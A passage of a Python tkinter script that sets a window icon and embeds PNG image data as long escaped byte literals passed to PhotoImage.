xe2EZ{\x9e\x15;\xd0x\xdf\xbf\xfb_A4;\xf6!>e\x9dj\xba\x88\x91\xbcM\x93\x08\x99D,\xce\xf9\xb1\xdfx\xef\xcb\x1f\xf0\x07\xf7=p\x03uE\x18\xbda\x90\xd7C\xe4j\xcdX\xc1>\xd6\x12+\x04\xda\xdd4\xb76b\x96\xe4\x0b\xcc\tu\x06\x06\x9e:.\x12\xaeDS%\xc5\xe93\x0b\xe4\xcc\x16\xdc-\xdd\x8c\x8c\n3\xd7\xe5\xa7\x1d\'\xd4\x19\xc8g\x92|\xf6\xd5Y^\xfc\xe8G\x86\x1fV\xe9\xec\xde\x89\x12\xec\xc7\xf3\xd0\xa8\x98|\xe5c\xd6\tu\x06|\x81\x00o\xbf\xf6\xbc\x98v"\xac\xa6\xc4xe\x8a\x014\x93\x12\x13O\x92\x9c\x08\x9b\xcd\xa0\xce@\xb9\x98\x13\xd3N\x03\xaf\xbft\x8c\xc7\x9f<@Ui\xda(S\x8a\x89\x19\x8aY\xddV=X\xea\x0c\xb8\\^jU\x03\xc5\x93\xa7R\xcd\x8b\xe7\x02V9+&\x1e\x8fh\xcb=\xfc>;o+\xff\x99\xc9\xc9I\xfb\xc9\x19RI\xb8\x19\xd4\xed\xc0V\xb0\xc5\x06\xe0/\t\x12\xef\xcd\xd8j\x93\xad\x00\x00\x00\x00IEND\xaeB`\x82')
menu.iconphoto(False,photo)
photo=PhotoImage(data=b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x01\xf4\x00\x00\x01\xf4\x08\x06\x00\x00\x00\xcb\xd6\xdf\x8a\x00\x00s\xbdIDATx^\xed\x9d\x05\x98UU\xf7\xc6\x19:\x86\x92\xeeFB@\x0cJ\xf4o\xa0\xd8\n\x8a\xdd\x18\xa0\xd8\x18\x9f\x80(v\x81\x01v#\xa5\xa0\xe8gc\xa2\x08\xd8\x89t\xc7\xd0\xdd0\xf3\x7f\xdf\xc3]\xf3\x1d\xaf\x03sg\xe6\xc6\x89\xf7<\xcf<w\xe6\xdesv\xfc\xf6\x99\xfb\x9e\xb5\xf6\xdak\x17*\xa4C\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04D@\x04RF\xa0I\x93&\x95\xdf~\xfb\xed1sq\\|\xf1\xc5\xe7\xa5\xac!\xaa8\xd0\x04\xaaV\xadZt\xf8\xf0\xe1\xaf\xcc\x9b7oN\xdf\xbe}o\xa8P\xa1B\xd1@wX\x9d\x13\x01\x11\x10\x81d\x13\xc8\xca\xca\xca\xdc\xbd{7^\xf6\x1c\xa7\x9cr\xca\xf1\xc9n\x83\xea\x0b>\x81i8v\xec\xd8\xe1\xdcc;w\xee\xcc\xea\xd9\xb3\xe7\xa5\xc1\xef\xb5z\xe8g\x02\x85\xfd\xdcx\xb5=|\x04`5\x95F\xaf\xd3\xac\xe7\x10\xf6Bm\xda\xb498|$\xd4\xe3D\x13h\xda\xb4i\xf3b\xc5\x8a\x15\xa2\xa0\x17-Z\xb4P\xf7\xee\xdd\xcfMt\x9d*_\x04\nB@\x82^\x10z\xba6\xe9\x04J\x96,Y\x1a\xd6\xd2\xce\xc2\x85\xf7\xdc\xbaE\x8a\x14)\x94\x9e\x9e^&\xe9\rQ\x85\x81\'\x80{+\x8b\x9d\x84\x95\xbe\x1d\x9a^h\xfb\xf6\xed[\x02\xdfiu\xd0\xd7\x04$\xe8\xbe\x1e\xbe\xf05\x1eZ\xbe\x03VS1\xf6\x9c\xd69\x8f\x8d\x1b7\xae\x0f\x1f\t\xf58\x91\x04*W\xae\\4\x13\x07\xeb(Q\xa2D\xc9\xb4\xb4\xb4B\xb8\xf7\xb6%\xb2N\x95-\x02\x05% A/(A]\x9fT\x02\xfcb\xb5\x83\xd69\xbfsa\xa1\xa7\'\xb5\x11\xaa,\xf0\x04V\xadZ\xb5\x0b\xf7Z\xf6\xcd\x061\xa77H\xdf\x97\x81\x1fy\x7fwP7\xa8\xbf\xc7/\x8c\xadw\x82\x94\xac\xe3t\xbd\xd3\x05\x1fF\x10\xeas\xd2\x088s\xe8:D\xc0\xeb\x04$\xe8^\x1f!\xb5/\x9a\x80\xe3\x06\x8d:\xb2\x05^\xb8D \x81\x04t\x9f%\x10\xae\x8a.8\x01\tz\xc1\x19\xaa\x04\x11\x10\x01\x11\x10\x01\x11H9\x01\tz\xca\x87@\r\xc8#\x01YIy\x04\xa6\xd3E@\x04\xc2A@\x82\x1e\x8eq\x0eR/\xff\x17\x15\xf7\xbf^I\xe4\x834\xc2\xea\x8b\x08\x88@\xbe\x08H\xd0\xf3\x85M\x17\xa5\x98\x80\x04<\xc5\x03\xa0\xeaE@\x04\xbcG@\x82\xee\xbd1Q\x8bD@\x04D@\x04D \xcf\x04$\xe8yF\x16\xde\x0b\xb0\xdc\xbbH\xb7n\xddN\xaa^\xbdzE\xa4`-N\x12\xa5K\x97\xd6z\x9e\xf0\xde\x12\xea\xb9\x08\x88\x80\x87\x08H\xd0=4\x18^nJ\x95*UJ\xbf\xff\xfe\xfb\x9fb\x97\xb3\xf7\x97,Y\xb2f\xf9\xf2\xe5\xdb\x98I\xeb\xf3\xcf?\xff\xb6b\xc5\x8a\xc5\x0e9\xe4\x90\xa6\'\x9f|\xf21\xc9\xe8\x03\x13~\xb8\x96\xa2\'\xa3J\xd5\x11r\x02\xee\x84F!G\xa1\xee{\x98\x80\xac\xab\xa8\xc1)W\xae\\\xfa\x86\r\x1b6yx\xcc\x92\xd6\xb4\x8e\x1d;\xd6\xafQ\xa3F\xe3\'\x9ex\xe2\xa5\xda\xb5k\xd7\xb5\x8a\x99\xcc\x05iW\xd3\x98\xa9\xad=\x0ed\xd5\xda\x8a\xf7\x8al\xd9\xb2e\xdbC\x0f=4\xe8\xd3O?\x1d?e\xca\x94\xbf\x93\xd6PU$\x02" \x02"PH\x16z\xe4&\xe8\xd7\xaf\xdf\xf5\xd8\xf7\xf8o\x08z1\xb8\x93C\x9fJ\xf4\xca+\xaf<\xafL\x992\xd5\xc7\x8c\x19\xf3a\xcd\x9a5\xb3\xc5|\xdb\xb6mN\xbaU\x8a9s\xa9\xd3r\xa1\x98G\xdc\xef%\x07\x0c\x18p\xffw\xdf}\xf7g\x8b\x16-\xea\xe9\xffK\x04D@\x04D@\x04\x92J\xe0\x80\x03\x0e\xa8\xf4\xc5\x17_|\xca\x94\xa2#G\x8e\x1c^\xb7n\xdd\xf2\'\x9cp\xc2\xd1-[\xb6l\x98\xd4\x86x\xa4\xb2F\x8d\x1aU\x84X\xef\xb2\xfd\xc6mOh\xf7\x1e\xe4\x10\xf5\xec\xfd\xc8\xb7n\xdd\x9a\xfd\xbb\x9d\x03W\xfc\xe7\x89\xe8\x0e\x1e.\xcap?tw\xfd\x83\x06\r\xea\x9f\x88\xbaTf\xb8\t\xe0\x1e\xdb\x1d\xb9\xb1\x9d\x9b}\xec\xd8\xb1c\xc2MD\xbd\x17\x01\x1f\x10\xa8S\xa7N1\xee\xe2\xc5\x7fZ\n\x12~w\xc4\x8c\xff\xd0_~\xf9\xe5\xe7/\xbd\xf4\xd23=z\xf48\x11\xfb#W\xf1Aw\xf2\xdcD\x04\xb6\x15n\xd7\xae]\xb3c\x8e9\xa6\xc3\xc2\x85\x0b\xe7\x9aZ\x82\x83\xf3}\xb6kW\xb6\xb6;\xbf\xf3\xc7\x84\xdb-\xac\xd8^2[\xd8\xf9\x0bx\xc5\xfd\x81H\x82\x9e\xe7\xe1\xd5\x05\xf9$ A\xcf\'8]&\x02\xa9$p\xc6\x19g\x9c\x10\x11p\x8a\xb9#Jnq\xe2{\x11\x01\xcb|\xf7\xddw\xdfj\xd5\xaaU`\xdc\xc9\x0cf\x83\x987\xe7\xf3\x8b\x89tN\x96\xb8[\xc4\xed\xc1\xc7\xad\xdef\xc5\xc3%\x9f\xfd6\xbd\x1c\xf1\x1eW\tz\xbc\x89\xaa\xbc\xbd\x11\x90\xa0\xeb\xde\xf0\x1b\x01\xcd\xa1c\xc4`\x99\x1e\x0b!r6\xfd\xe0\xaeJ\x8c\xa0\x8el\xb9\xed\x8c\'\xdf\x8b\xec\xbd\x9dv\xe2\x89\'\x9e\tQ\xff\xdao\x03\x9dS{\x9b4iR\xbbs\xe7\xce\x87c\xce\xfbw<\xb4\xa41\xd8\x8d\xf3\xe3|\xb5(r\x08\xb9s)\xe7\xcc\xed\xe0g<\x87\x87\x9dg\x7fc\xefh\xe7=\xfe\xe0\xc1\xa7u\x108\xa9\x0f" \x02"\xe0\x07\x02\x12t\x8c\xd2\xd2\xa5K\x97\x94,Y\xb2\xb0-M\x89^\xa2\xc2\xdd9)\xf0\x14u\x8a{\x83\x06\r\xea!\xf8\xebv\xcc\xb1W\xf5\xc3 \xef\xad\x8d\x10\xdc\x96\x88J\x7f\x16b\x8dn\xedY\xf0\x10\x89`w\x82\xdd\xec\xc1\xc6D\xdb\xca\xa1\xe8\x9b\x98\x1b+^g\xe2\xcf\xf7\xf8\x83\xb2\x07\xef\xbf\xff\xfe5\xfc\xccHm\x17\x01\x11\x10\x01\xbf\x10\x90\xa0c\xa4z\xf6\xec\xd9\xcb=`\x14p\nR\xc4*\xcf\xb6\xd6\xddV*\x02\xb1\x1e\xf8\xf3\xcf?3\xfc2\xd09\xb5\x13\x81\x80_\xa3O\xce=\xc0\xfeR\xa8-\x82\xdd\xdes\xbf\x9a\x15n\x1cL\xcc)\xf8\x91h\xf7\x7fT3\x7f\xfe\xfc%eq\xc4\x99QN\xb9\xdc\xe3\\\x85\x8a\x13\x81\xff\x11\xe0\x1cR\xe4\x01V)\x87ucx\x9a\x80\x04\x1d\xc3\x835\xd6\xf5)\xdefy\x9a\xdb\xdd-\xe0{\x19\xc54,\xeb\x1a\xe1\xe9\x11\xdeG\xe3\x8a\x17/^h\xe5\xca\x95\x19X?\xee\x9cE\xc16\xd1&\x8bh\xcb<\xa7\xa2x\x1e\xc5\x1c1\x07\xce\xf9\xc6\x10b\xbe\xb0W\xaf^=P\xfe<\xbf\xf2Q\xbbE@\x04D\xc0O\x04$\xe8\x18\xada\xc3\x86=B\xf161\xa3@\xd1J\x8f\xe58\xeb\xac\xb3\xcec\x84\xfc\xddw\xdf}K,\xe7{\xe9\x1cD\xb7\x97\xaaV\xadZu\xbc:\xcdr\x8b8Y\xc4\x92\x1d\xcb=wn\x0f@\xe4q\xe9\xa5\x97\x1e\xff\xc9\'\x9fLY\xb0`Al \xbd\x04Fm\x11\x01\x11\x10\x01\x1f\x12\x90\xa0\xef\xb1L\x9d\td\n\x1a\x85\x9c\xaf\xb4^c\x11u\x9e\x0b\x8b\xbeX\xff\xfe\xfd\x1fFZ\xd4W\x8e=\xf6\xd8\x96~\xb9\x0f^|\xf1\xc51\x10m\xe7\x1e0w\xbb[\xc4c\xb1\xd0\x8d\x91MOP\xe0\xf1\x90s$\x82\xed\x12\xb9\x12@nw\xbf\xdcdj\xa7\x08\x88@\xd2\x08(\xf5+PS\x8c(L\xb40\xdd\xd1\xed\xee\xdf\xf76"\x16\x11N!DPX\xd9f\xcd\x9a\x1d4a\xc2\x84\xbf\x926\x82\xf9\xac\xe8\xcd7\xdf|\x83\xd1\xfdXn\xe6\xf4\xd9\xedng\x916/\x9e[\xf1\xc6\x88\x0c\x17\xe3@&\xd8&\xcc\xf3>~\xfc\xf8\xdc.\xd5\xe7" \x02" \x02"\x10_\x02\x95*U*\xff\xec\xb3\xcf>ak\xd1\x99,\x05\xf3\xcaL,\xf3\x8fD){\xfb\xc3\x9dxe\xe2\xc4\x89_\x9es\xce9]\xb1\xb6\xfd\xff\xe2\xdb\xca\xf8\x956t\xe8\xd0Gm\xdd\xb8\xbbO\xb1\xf67\x9a\xc3\xe6\xcd\x9b\xb3\xee\xbd\xf7\xde\xbb\x11\x8b\xe0\xec\xc0\x96\xc8\x03\xeb\xd0\xd3m\x9c\xac\x1d\xca\x14\x97H\xe2\xe1-\xdb\xd6\xa1\xdb\xeb[o\xbd5:\xbc4\xd4s?\x10\x90\xcb\x1d\xa3\xb4z\xf5\xea\xf5\xd8\x80\xe4a\x08\xf3N\x8b\xf6.U\xaaTLAa\x1cd\xcbkN+\xf5\xf0\xc3\x0f?r\xc4\x88\x11\x1f\xc1R?\xb0B\x85\n\x9es\r#G\xfb\x05\xbd{\xf7\xbe\xd9\x96\xa9\x99\xab\x9dK\xce\xdc.vw\x80\xdb\xbend^\x8f9\xf8,\x04\xb3g\xc1@\xdf\xe1\x87\x9b^m\x14\x01\x11\x10\x81 \x12\x90\xcb=2\xaa\x19\x19\x19+\xa6\xe2\xe8\xd4\xa9Sg\n4]\xf0&z\xb9\t\x1a\xdd\xd5\xee\x88x\xfc\x9d\x86\xfc\xf0\x07\xae[\xb7\xceS\xcb\\\xb0{Z\xcbg\x9ey\xe6U\x9b&\xb0$2\xec\x9f\xbdgIa\xec\xbd\\n\xfa,z#p\xcdn\xa4n\xff2\x88\xff \xea\x93\x08\x88\x80\x08\x88\x80\x0f\t \xa0\xedpX\xd9\x8e\x9f\xdd\\\xd2\xe6\x86\xe6\xab\xa5\x85\xe5\xe7\xe6fg\x9aT;\xc7\x9d2\x95\x9b\x9b\x1cz\xe8\xa1\xb5\xbd\x82a\xe0\xc0\x81\xb7Z\x9b\xdd}rO\x17\xec\xcd\xfdn\xfdr\xf7\x1f\x1bU\x8c\xfc\xcf\x7f\xfe\xd3\x1b\x0f\t\xd5\x93\xd9G\xb9\xdc\x93I;\xdcu\xc9\xe5\x1e\xee\xf1W\xef\x03@`\xf4\xe8\xd1#\xa2\xe7\x92)d\xd1\xb9\xdd\xdd\xe2GQ\xe45\xf6\xc3\xcf\xb0\\k\t\x84\xd03K\xb6f\xcd\x9a\xb5\xd8\xddf\xb78\xb3\xdd&\xec\xd6O\xf7C\x8a\xfb\\\x8a;\x1fVR5\xd4\x12\xf4T\x91\x0f_\xbd\x12\xf4\xf0\x8d\xb9\xdf{\xac9\xf4\xa8\x11\xe4\\\xfa\xf7\xdf\x7f\xff\xb3%H\xe1\xc7t\xbds\x19\x9b-\xcd2W\xbc-qs\xef\rn\xd7a\x0b\xd6\x9a\x98\x8f/\xda\xad[\xb7cRy\x93\xd4\xaaU\xab\xdc78\x1a7n\\\x8b\xed\xc0V\xa7\xce\\\xb9\xf5\xc1\x1d\xe1\xefv\xb3[,\x81\xf5\x9f\xe7\xf1:\xb8\xe6\xb3\xfe\xfb\xdf\xff\xbe\x99\xca>\xa9n\x11\x10\x01\x11\x10\x81\x7f\x13\xd0\x1cz\x14\x93\xc9\x93\'\xff\xd6\xb5k\xd7\xf6\xbf\xfd\xf6\xdb\\\x88r\x1dK2\x13\xbd\x84\x8dAd\x96\xdf\xddD\xcfr\xbeS4)\xf2|\x08@\xe4w"\xd7c\xe7zO#@\xef\x1d\xac\t\xefLAf_\x18\xecg\x07\x97\xac\xb1\x8d6\xff\xcf>\xb9\xd7\xa1\xbb7`\xe19\xb4X\xb0,\xadn\xbdz\xf5<3\x95\x90+\x00\x9d \x02" \x02"\x10n\x02\xc7\x1dw\\gs\xa5\xdb\x1c\xb2\xdb\x1d\xed\x9e\x87v\xbb\xe8\xa3\xf7\x0e\x9f\x87\x03e\xb5O6\xcd\x8a\x15+\xa6!&\xa0\x03\xda\xbc\xdb\xbd\xcc+\xa7\xbe\xf0s\xb7[\xdd\xb5],c\t2\xfb\xf5\xebw\xe3\x9dw\xdeys\x87\x0e\x1d\x9a$\xbb\x1f\xd1\xf5\xc9\xe5\x9e\xea\x11\x08O\xfdr\xb9\x87g\xac\xd5\xd3\x80\x13HOO/\x8a\x8cg\'\x7f\xfb\xed\xb7\x93(x\xb6\xcfwtp\x9c\xcdK\x9b\xd8S\x0c\xddk\xbc)\xf0\xcf?\xff\xfc\xb0\x83\x0f>\xb8n\xb2\x91q\x19\x9e\xbb\xed\xd6V\xf6\xc1\xddF\x13y\xf6\xd1\x1d\xd8\xf7\xf8\xe3\x8f?x\xfc\xf1\xc7w\xa8_\xbf~z\xb2\xdb\xbe\xb7\xfa \xe8e\xb5\x0e\xdd+\xa3\x11\xecvH\xd0\x83=\xbe\xea]\x08\t@\xcc\xaa<\xf6\xd8c\xf7CD\xf0\xff\xfd\xbfD3QVl\x8e9gL\xe4)\xea\xb0roH&\xbe\x193f\xfc\xe5n\x94\tu$\xa8\xcd\xf9\xc8\x1d\xc4\xe7\xea[\xe6\xb8q\xe3F>\xfa\xe8\xa3\x03\x92\xd9\xdeX\xeb\x92\xa0\xc7JJ\xe7\x15\x94\x80\x04\xbd\xa0\x04u\xbd\x08x\x94\x00\xdc\xcd\xcd\x18\xdd\xed\xb6`\xa3#\xdd\xdd\xcb\xd9\xa2\xc5t\xc9\x92%\x19\xd8\x99\xedul\x86\x92pk\x17;\x9d\xcda\xfd\xd6V>P\xe4\xd4\xee\xe8\xe5v\xb4\xe8/\xbb\xec\xb238\x04H\x0b[\xd3\x8bC!A\xf7\xe2\xa8\x04\xb3M\x12\xf4`\x8e\xabz%\x02\x0e\x81E\x8b\x16\xcd\xc1O\x86\xdbu\xed\x16N\xb7\x80\x9a\x05\xecvm\xd3\xaa\x1f0`@Bwe\xc3\x94\xfd,\xb7\'\xc1-\xe46\xbf\xef\x9e\xe7w[\xe6~\x18f\nz\xf4\xb2B\xa4~\xf5\xa47\xc1\x0f<\xd5\xc6\xbd\x13\x90\xa0\xeb\xee\xf0\x1b\x01-[\xcb\xc3\x88\xd5\xa9S\xa7\x11~\xaa\xd3\x92\xb5\xa8\xf1\xc8R.n\xcc\x92\xbd\xfd*#\xc2\x19A\xce\x88q\x8b\x8e\xe7\xdf\\*\x06\xf1y\xe8\xe8\xa3\x8f>8\x0f\xd5\xc6|*\xd6\xd0\xbf\x81\x08\xf4\xc69E\xaa\xdb\xe63,\xcc\x9d).\x12\xc5\xbf\x1d\xcb\xda\xfe\x17\xfe\x1es\x8d:Q\x04D@\x04D\xc0+\x04$\xe8\xf9\x18\x89SO=\xf5H\x06\x86\xf3R[wnK\xbf(\xf4\xb6\x1c\x8cbO\xa1\xe79\\\x1e\xc6\x83\xf3\xea\x9f}\xf6\xd9\xf7x/\xaeIg\x86\x0f\x1f\xfe\xe2\xd9g\x9f}\xbe{\xfd8\xdb\xc2\xfa\xf9j\x0f\x16\xa8\xdfy\xd0\x88\x88~\x166\x919\x1em+9g\xce\x9c\xed\xf9@\xa1KD \xc8\x04<\xb7\x17C\x90a\xabo\x05\' A\xcf\x07C\xb8\xb5g"\xed\xfbG\x88\x82?\x1e[\x85\xce\xfb\x0e\x87\x15c\xeb\xcf)\xa2\xfc\xa1Un\x163\x85\xbeD\x89\x12\x85\xb9\x079~\x8a4j\xd4\xa8B>\xaa\xff\xd7%\xbdz\xf5\xba\xe4\x82\x0b.\xe8i\x1fX}\xb4\xc4Y\xbf\xe5\xa6\xa7\xb8\xa3~\'A\x0c\x7f\xc7\x16\xaa/a\x0f\xf7O\xe2\xd1\x06\x95!\x02" \x02" \x02\x81 \x80\x80\xb7\xe1\xb6\x96\xdb=\xc7\x9bS\x1aYW\x9a\xd5m\x05\xed<\xdc\xec\xaf\xb9\xf3\xcaG\x07\xe6\xed-\x88\xafK\x97.\x1d\nZw*\xae\xd7\x1cz*\xa8\x87\xb3N[\xd6bs\xe9\xda>5\x9c\xf7\x81\x9fz-\x0b=N\xa3\x05w\xf7\x85\xe3\xc7\x8f\x1fi)R\xadX\xb3\x86\xed\xd5m1\xc3\xd5]b\xe1\xc2\x85\xf3\xb1\xd6\xbbc~\x9a\x81k\xe7\xa2\xde\x8b\xcc\xddo\x99\xdd"Y\xdd\x1c+\xdc}\xb0\r\x14|$\x9ci\x07\xb7\xff\x94\xfc\xd4\xa9kD@\x04D@\x04D \x14\x04&M\x9a4\x91\xa2\xe9\x8en\xb7\xa8\xf8\xe8]\xcb\xcc\xa2\x9f={\xf6\x9c\xbc\xc0\xa9Q\xa3F\xda\xdc\xb9sg\xf2\xfa}e\xa9\x8b^V\xc7ew-Z\xb4\xf0\xe4r\xb4X\xfb/\x0b=VR:\xaf\xa0\x04d\xa1\x17\x94\xa0\xaeO6\x01Y\xe8q&~\xddu\xd7\xf5D\x12\x99[\x18\x84F\x8b\x98\x07\x83\xe2\xecw\xfeM+\x9d\x7f\xdb\x06)\x98Ko\x88\xb5\xe3sci\xca\xfe\xfb\xef_\x0es\xf8\x9b\x1b4h\xd0\x84\x968\xe7\xcbY\x16\xebp\x07\xe6\xd9\xbc9\xcb\xa4\xd7\x80\x7f#\x05m\xc7i\xd3\xa6-\x8d\xa5\x1e\x9d#\x02" \x02" \x02"\x00\x02\x19\x19\x19K\xdc\x99\xd8\xdcs\xd9\xee\xf7m\xbd:_!\xd4\xf3\xf7\x05\xafy\xf3\xe6\x15l>\xcf}\x9d\x95\xed.\xd7=\xafN\xcb\xbcG\x8f\x1e\'\x04a`d\xa1\x07a\x14\xfd\xd1\x07Y\xe8\xfe\x18\'\xb5\xf2\x7f\x04d\xa1\'\xe8n\xa8^\xbdz-d\x87[`\x96\xb9\xad\xfd\xe6zpZ\xd5\xb6\x9c\x8d\xd5[T:\xd6\xb8\xd7\xc3\xbc\xf8\xb2\x9c\x9aD1\x87u\xbd\x06\x9f\x15\x8e\xcc\x85g[\xe76w\xee.\xcb\xe6\xd1\xf9Y\x9b6m\xea#\xa0\xe7\xa3\x04uU\xc5\x8a\x80\x08\x88\x80\x08x\x80\x80\x04=\x81\x83\x00\x81\xae\xbfl\xd9\xb2\x85&\xea|\xa5+\x9e\xeeq\xbe\x9a\xc8\xb3\t\\\xd2F\x11f\xe2\x9aY\xb3f-(_\xbe|\xf6\xd8`\xde\xbb\xd2\x1f\x7f\xfc\xb1\x12\xd7C\xfb\xd3\x1c\x17\xba\xbd\xf2\x01!\xfa0\x17<\xcb\xe7:\xf3?\xff\xfcsq\x02\xbb\xa9\xa2E@\x04D@\x04<@@\x82\x9e\xe0A\xe0~\xe8X\xef=\x9c\xd5X\x12\x1a\xb3\xb0\xf9\xb7Y\xebL<\xb3e\xcb\x16\xe7\x1cdm\xab\xfb\xc1\x07\x1f|\x8f\xfd\xd8\xd3[\xb7n]\xe9\xaf\xbf\xfeZ\t\xb1/j\x96\xbc\xcd\xc1\xdb\x9aw\x96m\x96?\xc5\x9e\x07\xc5\x1c\xbb\xa5=\xa0u\xe6\t\x1e`\x15/\x02" \x02"\x10.\x02HD\xf3mN\xd1\xef{\xdb4%\xb2]+\xb7w\xcb\xb4\x88yw\x0ev\xbeg;\xa7m\xdd\xba5;\xa0=R^\xe6\x15W\\q~\x10\tk\x0e=\x88\xa3\xea\xcd>i\x0e\xdd\x9b\xe3\xa2V\xed\x9d@Q\xc1I\x0e\x81\xf6\xed\xdbw\x86\x15\xbd\x03\xae\xf6b\x16u\xceytZ\xdb\xe6B\xa7U\r!/T\xb2dI\'\xa3\x1b\x8e4Z\xde\x96\xb6\x95\x169\xad{w\x8ex\x9e\xc4\xf3m\xcd9\xca\xcb:\xe8\xa0\x83\x1a\xfe\xf2\xcb/\xf3\x93\xd33\xd5"\x02" \x02"\xe0\x05\x02r\xb9\'q\x14\xfa\xf7\xef\x7f#\xe6\xd4\x97[\xc0\x9a-[\xe3\xdf\x16\xd8Fq\xa6\xc0\xd3\xf5N\x91\xa6\x98\xdb<\xb9\x899\xff\xb6yr\xce\xbd\xf3`\x19\x14\xf3\x96-[\xd6\x92\x98\'qPU\x95\x08\x88\x80\x08x\x84\x80\x04=\x89\x03\xf1\xd0C\x0f\r\x83\xcb\xb8:-uwd\xba\xcd\xa9\xb3)\xb6\x9e\xdc\xf2\xb0[ \x1d?3a\xa7\xc8\xd3J\xe79\x9c{\x8f\\\x9f\t1\xaf\x89H\xf8\x1c\xa3\xe4\x93\xd8MU%\x02" \x02"\x90\x02\x02\x12\xf4\x14@g\xca\xd7\xc9\x93\'\x7fG\xf1\xb6\xc08\x8bZ7\xa17\x17\xba{+T\xdb\xb1\xcd\xdddZ\xf3X\x1e\x97q\xc0\x01\x07\xd4\x86\x98g\xa4\xa0;\xaaR\x04\xc2B@\xbb\xaf\x85e\xa4}\xdaO\tz\x8a\x06\xaeS\xa7N\x87!\xf7\xfbX\n8-o\n\xb8\xb9\xe2\xd9$\xb7\x05\xbf\xaf&\xaeX\xb1"\x03K\xddj\xfc\xfd\xf7\xdf\xb2\xccS4\x96\xaaV\x04D@\x04\xbc@@\x82\x9e\xc2Q\xc0\x1a\xf1\x1e\x8b\x17/\x9eO\x17\xba\xcd\xa7[sb\x14\xf4,\xb8\xf0k\xa4\xb0\x0b\xaaZ\x04D@\x04D\xc0#\x04$\xe8)\x1e\x88a\xc3\x86\r\x81\xdb<\x93\xaes\x06\xb8E\xcf\xad\xa7\xb8y~\xa9^\xaeP\xbf\x8c\x94\xda)\x02"\x900\x02\x12\xf4\x84\xa1\xcd\xbd\xe0\xcb/\xbf\xfc\xbc\x07\x1ex\xe0q\x88xaK\x12\xb3}\xfbv\xe7B._s\xcf\x9f\xef\xad\xb4\xde\xbd{\xf7\xcc\xbd&\x9d!\x02" \x02"\x10t\x02\x12\xf4\x14\x8d\xf0\x1dw\xdcq\xe3\x0b/\xbc0\x02s\xe7N:W\xcb"g\x81o\xb6|-\x97\xe6\xa5=\xf9\xe4\x93\xcf\xa4\xa8\x0b\xaaV\x04D@\x04D\xc0C\x04$\xe8)\x18\x8c\xab\xae\xba\xea\xc2\xfb\xee\xbbo\xb0{\x0bU\x13t{e\xb3b\x99G\xc7\xdc{\xb1\x05\x0b\x16\xccKA7T\xa5\x08\x88\x80\x08\x88\x80\x87\x08H\xd0\x93<\x18\xdc,\xe5\xa9\xa7\x9ez\x91\xd5F\xef\x91\xce\xf7,\x1b\x9ce\x8f\x8b\xa5y\xb5j\xd5\xe2nj\xa3c9W\xe7\x88\x80\x08\x88\x80\x08\x04\x93\x80\x04=I\xe3\xda\xb5k\xd7\xc3\xb1Y\xca#\xd8\xa8\xe5}\x88vqV\xeb\x9e#7q\xb7u\xe9&\xec\xee\x9d\xda\xdcM\xb5MX\xf8\x1e\xaf9\xf3\xcc3\xcf\xbe\xf2\xca+/JRwT\x8d\x08\x88\x80\x08\x88\x80\xc7\x08(\x97{\x12\x06\xa4I\x93&5\xb1{\xdaW\x10^\xc6\xbfe\xa7m\xe5\xef\x14c\xbe\xda\xaek\\\xbefk\xd2\xf7\x15\x14gk\xd6-\xaf;\xcb\x19:t\xe8\x0b\x8b\x16-\x9a\xf3\xd1G\x1fMJB\xb7T\x85\x08\x88\x80\x08\x88\x80\x87\x08\xc8BO\xc2`\xbc\xfc\xf2\xcboA\x80\x0b\xdb&+\x14a\x8bf\xb7\xc42l\x86\xcd\x99S\xd4\xe7\xce\x9d;\xbfG\x8f\x1e\'A\xdcw\x9a\xd5\xce\x044\xfc\xddR\xc0\xf2|\xb7\xa5\x8e\xf2\x8b\x7f\xf8\xe1\x87\xdf4m\xda\xb4B\x12\xba\xa5*D@\x04D@\x04<D@\x16z\x82\x07\x83\xdb\x9f2\x92\x9d\xd5P|-\x10\xaeT\xa9R\x8e0S\xe4M\xe8\xad)\x10\xed\x9d\xc8$\xb7?\xb2\xc0\xed\xf8\xf3\xcf?\xeb\xe2g\x11\xca(j\xe7\x99\xf0\xdb\xf5f\xe5G^\xd3f\xcc\x98\xb1\x06\x0f\rzXK\xf0\xd8\xaa\xf8\xd0\x10P\x9e\x83\xd0\x0c\xb5\xbf;\xaa/\xfd\x04\x8e\xdf\x80\x01\x03n\x85\xc8\xa6\xb9wU\xb3\xdf\xdd\x9b\xaeP\xe8)\xce\x11w|\xe6\xfe\xfb\xef_\x9eb\xce\xa6M\x9f>=\xe3\x90C\x0ei\x0e\x81\xdeeV\xbd\xbd\xba\x1f\x04X\x9e\xb9\xf3qY\xda\xc2\x85\x0b\xe7\x96-[6\x88_DY\t\x1c2\x15-\x02" \x02\xbe% 